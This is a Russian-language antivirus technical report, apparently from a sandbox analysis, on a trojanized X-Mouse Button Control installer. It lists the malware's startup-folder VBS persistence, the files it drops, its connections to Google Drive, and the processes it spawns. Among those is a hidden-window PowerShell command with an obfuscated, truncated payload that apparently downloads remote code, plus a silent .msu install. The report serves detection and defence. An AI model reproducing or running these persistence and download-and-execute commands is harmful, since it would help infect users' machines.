Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\x-mouse-configs.vbs
Вредоносные функции
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %ProgramFiles(x86)%\xmouse extractor\x-mouse-button-control-2-20-5.exe
- %ProgramFiles(x86)%\xmouse extractor\x-mouse-configs.vbs
- %TEMP%\nsu6f37.tmp
- %TEMP%\nsk6f48.tmp\system.dll
- %TEMP%\nsk6f48.tmp\iospecial.ini
- %TEMP%\nsk6f48.tmp\modern-wizard.bmp
- %TEMP%\nsk6f48.tmp\installoptions.dll
Сетевая активность
Подключается к
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
TCP
Запросы HTTP GET
- http://pk#.goog/gsr1/gsr1.crt
Другие
- 'drive.google.com':443
UDP
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
Другое
Ищет следующие окна
- ClassName: 'EDIT' WindowName: ''
Создает и запускает на исполнение
- '%ProgramFiles(x86)%\xmouse extractor\x-mouse-button-control-2-20-5.exe'
Запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%ProgramFiles(x86)%\Xmouse Extractor\X-Mouse-Configs.VBS"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$JbTzY = 'Ow⁉В©9ADsAKQAgACkAIAAnADEAZQ⁉В©1AHIAdAAnACAALAAgAHYATw⁉В©hAFoARwAkACAALAAgACcAaA⁉В©0AHQAcA⁉В©zADoALwAvAHAAYQ⁉В©zAHQAZQ⁉В©iAGkAbgAuAGMAbw⁉В©tAC8Acg⁉В©hAHcALw⁉В©MAEMAUg⁉В©XAHA... (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' wusa.exe %TEMP%\\Upwin.msu /quiet /norestart
- '<SYSTEM32>\wusa.exe' %TEMP%\\Upwin.msu /quiet /norestart
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "sleep 180"
